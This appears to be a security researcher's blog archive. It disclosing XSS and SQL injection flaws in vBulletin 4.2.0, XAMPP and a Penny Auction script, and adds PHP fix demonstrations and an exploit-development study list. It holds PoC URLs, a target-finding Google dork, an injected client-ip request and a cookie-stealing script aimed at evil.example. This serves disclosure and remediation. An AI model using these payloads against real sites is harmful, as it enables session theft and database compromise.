Tuesday, June 19, 2012

vBulletin 4.2.0 XSS Vulnerability

$------------------------------------------------------------------------------------------------------------
$ vBulletin 4.2.0 XSS Vulnerability
$ Author : sangteamtham
$ Home : Hcegroup.vn
$ Download: http://members.vbulletin.com/
$ Date :06/13/2012
$ Google Dork: "Powered by vBulletin® Version 4.2.0"
$ Twitter: http://twitter.com/Sangte_amtham
$*************************************************************************************************************
1.vBulletin Description:

 Content publishing, search, security, and more— vBulletin has it all.
 Whether it’s available features, support, or ease-of-use, vBulletin offers the most for your money.
 Learn more about what makes vBulletin the choice for people who are serious about creating
 thriving online communities.

2. Vulnerability Description:

The title of a calendar event is stored without HTML escaping and is later rendered into pages viewed by other users (the activity stream shown on a member's profile, which is where the vulnerable template below puts it). To steal the cookie of an administrator or any member of the forum, or to redirect them to a malicious site, the attacker first registers an account, then goes to the calendar section and creates an event for himself.

In the title field, he injects the XSS payload.

In the content section, he can write whatever he likes. He then sends the link to his profile to the administrator or any other member and waits for the cookies, or for the victims to be infected.

http://127.0.0.1/vbb/member.php?id-xyz

3. Patch:

June 13, 2012: Contacted the vendor.
June 14, 2012: Vendor replied.
June 18, 2012: The vendor released the patch for this vulnerability. Download it from the members area:

https://members.vbulletin.com/patches.php

$**************************************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$------------------------------------------------------------------------------------------------------------

How to fix it?

The vulnerable file is event.php, the calendar event view of the activity stream:
doc_root/vb/activitystream/view/perm/calendar/event.php

Lines 74 to 77 read:

    public function fetchTemplate($templatename, $activity)
    {
        $eventinfo =& $this->content['event'][$activity['contentid']];
        $calendarinfo =& $this->content['calendar'][$eventinfo['calendarid']];

The event title is handed to the template exactly as the user stored it, so any HTML or script in it is rendered as markup. Escape it before it reaches the template:

    public function fetchTemplate($templatename, $activity)
    {
        $eventinfo =& $this->content['event'][$activity['contentid']];
        $calendarinfo =& $this->content['calendar'][$eventinfo['calendarid']];
        // HTML-escape the user-supplied title before it is handed to the template
        $eventinfo['title'] = htmlspecialchars_uni($eventinfo['title']);

Because $eventinfo is a reference into $this->content, the escaped title replaces the stored one for the rest of this request; check that no later code path escapes the same record again, or titles will show double-encoded entities such as &amp;lt;.

Please fix it as soon as possible.

Thursday, October 27, 2011

Xampp 1.7.4 for Windows Multiple Cross-Site Scripting Vulnerabilities

$-------------------------------------------------------------------------------------------------------------------
$ Xampp 1.7.4 for Windows Multiple Cross-Site Scripting Vulnerabilities
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.apachefriends.org/en/xampp-windows.html
$ Date :07/12/2011
$ Twitter: http://twitter.com/Sangte_amtham
$******************************************************************************************
1.Description:

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really
very easy to install and to use - just download, extract and start.

2. Patch:

Jul 12, 2011: Contacted the vendor.
Jul 12, 2011: Vendor said they would fix it in the next release.
Sep 21, 2011: XAMPP 1.7.7 released.
Oct 27, 2011: Advisory published.

3. POC:

http://localhost/xampp/ming.php?text=XSS H3r3
http://localhost/xampp/cds.php/ XSS H3r3

ming.php reflects the text query parameter into the page unescaped; cds.php reflects the path appended after the script name.

adodb.php contains a form for submitting database connection details, but the submitted values are not filtered properly, so malicious code can be submitted through it:

http://localhost/xampp/adodb.php


$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------
Reference:
http://www.securityfocus.com/bid/50381/info
http://packetstormsecurity.org/files/106244/xampp174-xss.txt
http://seclists.org/fulldisclosure/2011/Oct/944

Thursday, March 17, 2011

Penny Auction Clone (Swoopo Clone) SQL Injection and Cross Site Scripting Vulnerabilities.

I am really swamped with work. Working for a living and putting my favourite things aside. Really sad :(


#-------------------------------------------------------------------------------------------------------------------
# Penny Auction Clone (Swoopo Clone) SQL Injection and Cross Site Scripting Vulnerabilities.
# Author : Sangteamtham
# Home : Hcegroup.net
# Download :http://www.pennyauctionsoft.com/
# Date :03/20/2011
# Twitter:@Sangte_amtham
#
#******************************************************************************************
#1.Description:
# Pennyauctionsoft is a brand new powerful, effective and feature-rich Swoopo script clone application
# that is ready to use out of the box.
#2.Vulnerabilities:
# I reported this to the authors. After an interesting conversation, everything is still the same until now.
# Almost all of the files have XSS vulnerabilities. I will not list all of them, but here are some.
#2.a XSS vulnerabilities:
# The part of the URL path after the script name is reflected into the page without escaping
# (the leading quote in the payload closes the HTML attribute the value lands in):
# http://server/index.php/"XSS
# http://server/jobs.php/"XSS
# http://server/contact.php/"XSS
# http://server/forum/index.php/"
# http://server/forum/index.php/",
#
# Many other pages are vulnerable in the same way.
#
#2.b: MySQL injection.
# The value of the client-ip request header is not filtered before it is used in a database query.
# A GET request to allauctions.php carrying a single quote in that header triggers the injection:
#
# http://server/allauctions.php
#
# Host: www.server.com
# User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
# client-ip: 127.0.0.1 '
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-us,en;q=0.5
# Accept-Encoding: gzip,deflate
# Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
# Keep-Alive: 115
# Connection: keep-alive
# Cookie: PHPSESSID=dc3fa290bcf7f865d6c43bb19e607a74
#
# As a demo, an attacker would confirm the vulnerability this way and then extend the injection to extract credential information.
# The same injection point exists on:
# http://server/allauctions.php
# http://server/registration.php
# http://server/forum/forum_detail.php
#
#
#******************************************************************************************
# Greetz to: All Vietnamese hackers and Hackers out there researching for more security
#--------------------------------------------------------------------------------------------------------------------
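The reflection points described in the advisories above (the stored vBulletin event title, the text parameter of XAMPP's ming.php and the path appended after cds.php, and the index.php/"XSS path payloads against the Penny Auction script) all come down to user input reaching HTML without output encoding. What follows is an added example, not code from vBulletin, XAMPP or the Penny Auction script: a stand-alone PHP script with one hypothetical render function per case beside its hardened form, run against a constructed payload. Plain htmlspecialchars() with ENT_QUOTES stands in for vBulletin's htmlspecialchars_uni(); the function names, the eventid field, the markup and the evil.example host are invented for the example.

```php
<?php
// Added example, not code from vBulletin, XAMPP or the Penny Auction script.
// One hypothetical render function per reflection point, each beside its
// hardened form. Run with the PHP CLI (7.0+): php xss_demo.php

// Escape for HTML element text and for single- or double-quoted attributes.
// ENT_QUOTES covers both quote characters; ENT_SUBSTITUTE keeps invalid UTF-8
// from turning the whole output into an empty string, which would hide input.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 1. Stored data rendered into a template (the vBulletin event title case).
function render_event_vulnerable(array $eventinfo): string
{
    // The stored title goes straight into markup: <script> in it executes
    // in the browser of whoever views the activity stream.
    return "<a href=\"calendar.php?e={$eventinfo['eventid']}\" title=\"{$eventinfo['title']}\">"
         . $eventinfo['title'] . '</a>';
}

function render_event_fixed(array $eventinfo): string
{
    $id    = (int) $eventinfo['eventid'];   // numeric field: cast, do not escape
    $title = esc($eventinfo['title']);      // text field: escape at output time
    return "<a href=\"calendar.php?e={$id}\" title=\"{$title}\">{$title}</a>";
}

// 2. A query parameter reflected into the page (the ming.php?text= case).
function banner_vulnerable(array $get): string
{
    return '<p>' . ($get['text'] ?? '') . '</p>';
}

function banner_fixed(array $get): string
{
    return '<p>' . esc($get['text'] ?? '') . '</p>';
}

// 3. The request path reflected into a form action (the cds.php/... and
// index.php/"XSS cases). PHP_SELF includes whatever path the client appended
// after the script name, so it is attacker-controlled.
function form_vulnerable(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="post">';
}

function form_fixed(array $server): string
{
    // SCRIPT_NAME is the script's own path without the appended PATH_INFO;
    // it is still escaped because nothing that lands in markup should be
    // trusted on the strength of which server variable it came from.
    return '<form action="' . esc($server['SCRIPT_NAME']) . '" method="post">';
}

// Constructed input: the kind of payload the advisories describe.
$payload = '"><script>document.location="http://evil.example/?c="+document.cookie</script>';
$event   = ['eventid' => 7, 'title' => $payload];
$get     = ['text' => $payload];
$server  = ['PHP_SELF' => '/index.php/' . $payload, 'SCRIPT_NAME' => '/index.php'];

foreach ([
    'event (vulnerable)' => render_event_vulnerable($event),
    'event (fixed)'      => render_event_fixed($event),
    'text (vulnerable)'  => banner_vulnerable($get),
    'text (fixed)'       => banner_fixed($get),
    'form (vulnerable)'  => form_vulnerable($server),
    'form (fixed)'       => form_fixed($server),
] as $label => $html) {
    // A surviving "<script" tag means the payload would run in a browser.
    $verdict = stripos($html, '<script') === false ? 'safe' : 'EXPLOITABLE';
    printf("%-20s %-12s %s\n", $label, $verdict, $html);
}
```

The three "fixed" lines print safe because the payload's < has become &lt; and its quotes have become entities, so it can neither open a tag nor close the attribute it sits in. One check worth making against whichever escaper you adopt: whether it encodes the single quote as well as the double one; a value placed inside a single-quoted attribute is only as safe as that.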

References:
http://www.securityfocus.com/bid/46920/
http://securityreason.com/exploitalert/10171
http://secunia.com/advisories/43801
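The client-ip injection described in the Penny Auction advisory is the pattern of a visit logger that records the visitor's address and trusts a request header to supply it. Below is an added example, not code from the Penny Auction script: a hypothetical log_visit function in its vulnerable form beside a hardened one, run against a constructed request that carries the advisory's 127.0.0.1 ' header. SQLite through PDO (the pdo_sqlite extension is assumed to be available) stands in for MySQL; the visits table, the function names and the trusted-proxy list are invented for the example.

```php
<?php
// Added example, not code from the Penny Auction script. A visitor-logging
// query that trusts the client-ip request header, beside a hardened version.
// Uses an in-memory SQLite database via PDO so it runs from the CLI (7.1+)
// with no web server: php clientip_demo.php

function db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE visits (id INTEGER PRIMARY KEY, ip TEXT NOT NULL, page TEXT NOT NULL)');
    return $pdo;
}

// Vulnerable: the header value is pasted into the SQL text. Any client can
// send a client-ip header, so the attacker controls part of the statement.
function log_visit_vulnerable(PDO $pdo, array $server, string $page): void
{
    $ip = $server['HTTP_CLIENT_IP'] ?? $server['REMOTE_ADDR'];
    $pdo->exec("INSERT INTO visits (ip, page) VALUES ('$ip', '$page')");
}

// Hardened: (1) the header is only consulted when the TCP peer is a proxy we
// operate, (2) the value must parse as an IP address, and (3) the query is
// parameterised, so even a bad value can never be parsed as SQL.
function client_ip(array $server, array $trusted_proxies = []): string
{
    $ip = $server['REMOTE_ADDR'];
    if (in_array($ip, $trusted_proxies, true) && isset($server['HTTP_CLIENT_IP'])) {
        $candidate = trim($server['HTTP_CLIENT_IP']);
        if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
            $ip = $candidate;
        }
    }
    return $ip;
}

function log_visit_fixed(PDO $pdo, array $server, string $page, array $trusted_proxies = []): void
{
    $stmt = $pdo->prepare('INSERT INTO visits (ip, page) VALUES (:ip, :page)');
    $stmt->execute([':ip' => client_ip($server, $trusted_proxies), ':page' => $page]);
}

// Constructed request matching the advisory: a GET to allauctions.php with a
// single quote in the client-ip header. 203.0.113.5 is a documentation address.
$server = ['REMOTE_ADDR' => '203.0.113.5', 'HTTP_CLIENT_IP' => "127.0.0.1 '"];

$pdo = db();
try {
    log_visit_vulnerable($pdo, $server, 'allauctions.php');
} catch (PDOException $e) {
    // The stray quote ends the string literal early and breaks the statement:
    // the same error a tester sees when the application echoes database
    // errors, and the foothold for extending the payload further.
    echo "vulnerable: SQL error -> ", $e->getMessage(), "\n";
}

// Header ignored: 203.0.113.5 is not a trusted proxy, so REMOTE_ADDR is stored.
log_visit_fixed($pdo, $server, 'allauctions.php');
// Header considered but rejected: "127.0.0.1 '" is not a valid IP address,
// so REMOTE_ADDR is stored again and the quote never reaches the SQL text.
log_visit_fixed($pdo, $server, 'allauctions.php', ['203.0.113.5']);

foreach ($pdo->query('SELECT ip, page FROM visits') as $row) {
    echo "stored: {$row['ip']} {$row['page']}\n";
}
```

The vulnerable insert fails with a syntax error, which is exactly what a tester looks for and what an attacker then turns into a working extraction. The hardened version makes three independent changes, and each one on its own would have stopped this injection; keep all three, because the first two also stop a plain spoofing attack on whatever the logged address is later used for (rate limits, bans, fraud checks), which parameterisation alone does not.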

Monday, November 8, 2010

XSS Vulnerability at blogspot.com - Google trying to ignore it?

I reported this to the Google Security Team some days ago, but I have not received any reply from them, nor any fix. They may think this is nothing, not a problem. So whose problem is it? Who might be concerned?

I am still waiting for their reply. Maybe they will never be concerned.

Saturday, November 6, 2010

Xampp 1.7.3 multiple vulnerabilities

#**********************************************************
# Exploit Title: Xampp 1.7.3 XSS multiple vulnerabilities
# Date: 11/06/2010
# Author: Sangteamtham
# Software Link: http://www.apachefriends.org/en/xampp.html
# Version: 1.7.3
# Tested on: Windows 7
# Email: Sangteamtham@gmail.com
# Blog: http://sangte.blogspot.com/
# Homepage: http://hcegroup.net/hceteam
#***********************************************************

1.Description:

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start.

2. Vulnerabilities:

http://paste2.org/p/1075584



3. Poc:



4. Patch:

The vendor should filter special characters in the form input.
Users should password-protect the xampp folder.

5. Credits:
Thanks fly to Vietnamese hackers and all hackers out there researching for more security.
*************************************************************

Google Shop Online XSS vulnerability

1.  Description:

The Google Shop Online website sells products such as souvenirs online. From the site itself:
"How do we keep your information secure?
The personal information that you provide to Google Store, including your credit card or other payment information, is maintained on secure servers and protected by industry-standard Secure Socket Layer encryption. When entering personal information, look for an icon at the bottom of your browser window that indicates you are on a secure page."
URL: http://www.google-store.com

2.  XSS Vulnerability:

"Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007.[1] Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner." (wikipedia.org)

"What about cookies?
A cookie is a piece of data that identifies you as a unique user. When you visit the Google Store, we set a cookie on your computer to help identify you, customize your experience and maintain your account and order information. To protect the security of your account, you must accept the Google Store cookie in order to shop here." (google-store.com)

Here are some snapshots:

The XSS vulnerability was in the module produc_info.php, which does not filter special characters. An attacker can use it to insert JavaScript that steals cookies from customers, administrators and so on.
Take a look at the source view from Firefox.

3.  Reference:

Friday, November 5, 2010

From 0x90 to 0x4c454554, a journey into exploitation.

In the last few weeks I have been diving deeper down the rabbit hole of exploitation work and with a bit of work and time to prepare myself for the long run I compiled a set of areas to study in a course type layout. I hope my research will help others spend more time learning and less time searching.
Because I am doing this myself I may have missed 1 or 2 things and along the way I will add in anything I find to help with process. So let us both get started...

First off I want to thank the corelan guys for the help they have provided me so far in the process. They have been there for me through my learning with knowledge and help. Thank you!

Layout: I will be posting in a hierarchical structure; each level of the hierarchy should be fully understood before moving on to the next section. I will also post sets of parallel learning topics that you can use to study alongside other topics to help prevent monotony. These parallel areas have a start and an end mark which show when they should be complete relative to the overall learning.
Here is a PDF of the course to help keep track of and understand the layout: Course_layout.pdf
New background soon. Desktop background cheatsheet added to the documents page: Backgrounds

Other Posts like this one:
Because of the quality of these two posts I wanted to put them at the top. I could not figure out where to put them in the list because they cover so much.
past-present-future of windows exploitation
smashing the stack in 2010(Great resource)


Part 1: Programming

Parallel learning #1:(complete this section before getting to the book "Hacking Art of exploitation")
While going through the programming area I concentrate on core topics to help us later on with exploit writing. One area that is very good to pick up is some kind of scripting language. Listed below are some of the most popular scripting languages and ones I feel will prove to be the most useful.

Python: One of my favorite languages and growing in popularity python is a powerful language that is easy to use and well documented.
Wikibooks Python
http://docs.python.org/
onlinecomputerbooks.com

Ruby: If you plan on later on working inside of metasploit this may be the language you want to start with.
Wikibooks Ruby
LittleBookOfRuby
onlinecomputerbooks.com

Perl: An older language that still sees a lot of use, perl is one of the most used scripting languages and you will see it in many exploits. (I would suggest python over perl)
[book] O'Reilly Learning Perl
onlinecomputerbooks.com


C and C++ programming:
It is very important to understand what you are exploiting so to get started let us figure out what we are exploiting. You do not need to go through all of these but when finished with this section you should have a good understanding of C and C++ programming.
Cprogramming.com
http://www.java2s.com/Tutorial/C/CatalogC.htm
http://beej.us/guide/bgc/
onlinecomputerbooks.com

X86 Assembly:
Ok now to understand what the computer reads when we compile C and C++. I am going to mostly stick to the IA-32(X86) assembly language. Read the first link to understand why. It explains it very well.
Skullsecurity: Assembly
http://en.wikibooks.org/wiki/X86_Assembly
[book]The Art of Assembly
Assembly primer for hackers

Windows Programming:
This is to help understand what we are programming in and the structure of libraries in the OS. This area is very important far down the line.
http://en.wikibooks.org/wiki/Windows_Programming
http://www.relisoft.com/win32/index.htm
[book]Windows Internals 5
[book]Windows Internals 4

Disassembly:
Disassembly is not so much programming as it is what the computer understands and the way it is interpreted by the CPU and memory. This is where we start getting into the good stuff.
http://en.wikibooks.org/wiki/X86_disassembly


Part 2: Getting started

Now that we have a very good understanding of programming languages and what the machine is doing we can start working on task at hand, exploitation.
Here I will start a lot of the learning in very much a list format and adding in comments or Parallel learning areas when needed.

Smash the stack for fun and profit (Phrack 49)
C function call conventions and the stack
[videos] Code Audit from cryptocity.net

(Parallel learning #1 finished: you should now have completed Parallel learning 1 and have a good understanding of one of the 3 languages)

[Book]Hacking art of exploitation [Chapter 1&2]
Corelan T1
Corelan T2

Parallel learning #2:(complete this section before end of part 2)
(Read the first few posts on this blog; it has some good info)
Kspice blog
(Read some of the posts from this blog; they are very helpful when starting out with fuzzers.)
Nullthreat's blog
(I have linked directly to a demo exploit for this area, but this is a useful blog to keep track of for many things)
A demo exploit

tenouk.com: Buffer overflow intro
The Tao of Windows Buffer Overflow
nsfsecurity on BOF
Hacker center: BOF
[video] Buffer overflow Primer
[Book]Shellcoder's Handbook Ch1&2
[Book]Hacking art of exploitation [Chapter 3]
Corelan T3A
Corelan T3B
SEH overwrite simplified

(Parallel learning #2 finished)

Part 3:Tools of the trade

This is a list of tools I have started using and find very useful.
Immunity Debugger
Ollydbg
Windbg
IDA Pro
explorer suite
Sysinternals

And here are some corelan posts on how to use them. I will supply more in future but this is a very good start.
Corelan T5
Corelan: Immunity debugger cheatsheet

Part 4: Network and Metasploit

(Networking)
Beej.us network programming
[Book]Hacking art of exploitation [Chapter 4]

(Metasploit)
[Video]Security Tube: Metasploit Megaprimer
Metasploit.com
Metasploit Unleashed
Metasploit Louisville Class
Metasploitable (a target)
Corelan T4
intern0t: developing my first exploit
DHAtEnclaveForensics: Exploit Creation in Metasploit
Wikibooks Metasploit/Writing Windows Exploit


Part 5: Shellcode

Corelan T9
[Book]Shellcoder's Handbook Ch3
[Book]Hacking art of exploitation [Chapter 5]
Writing small shellcode
Shell-storm Shellcode database


Part 6: Engineering in Reverse

Parallel Learning #3:(constant place to reference and use for reversing)
[forum]reverse-engineering.net
Reverse Engineering the World
Room362.com reversing blog post

Ethicalhacker.net intro to reverse engineering
acm.uiuc.edu Intro to Reverse Engineering software
[Book]Reversing: secrets of reverse engineering
[video]Reverse Engineering from cryptocity.net
CrackZ's Reverse Engineering Page
Reverse engineering techniques

[GAME]Crackmes.de

Part 7: Getting a little deeper into BOF

Parallel Learning #4:(To the end of the course and beyond)
Find old exploits on Exploit-db download them, test them, rewrite them, understand them.

[video]Exploitation from cryptocity.net
Buffer overflow protection
Wikipedia Executable space protection
Wikipedia DEP
Wikipedia ASLR
Purdue.edu: Canary Bit
Corelan T6
Bypassing Hardware based DEP
Corelan T7
Corelan T8
Corelan T10
Virtual Worlds - Real Exploits

[GAME]Smash the stack wargaming network

Part 8: Heap overflow

rm -rf / on heap overflow
w00w00 on heap overflow
[Book]Shellcoder's Handbook Ch4&5
h-online A heap of Risk
[video]Defcon 15 remedial Heap Overflows
heap overflow: ancient art of unlink seduction
Memory corruptions part II -- heap

[book]Read the rest of Shellcoder's Handbook

Part 9: Exploit listing sites

Exploit-DB
Injector
CVE Details
Packetstorm
CERT
Mitre
National Vulnerability Database

(bonus: site that lists types of vulnerabilities and info)
Common Weakness Enumeration

Part 10: To come

1. Fuzzing
2. It might be a while, but I plan on doing a whole web exploitation post that will be an addition to this, as a whole new post



If anyone has any good links to add post a comment and I will try to add them or send me the link and I will review and add it.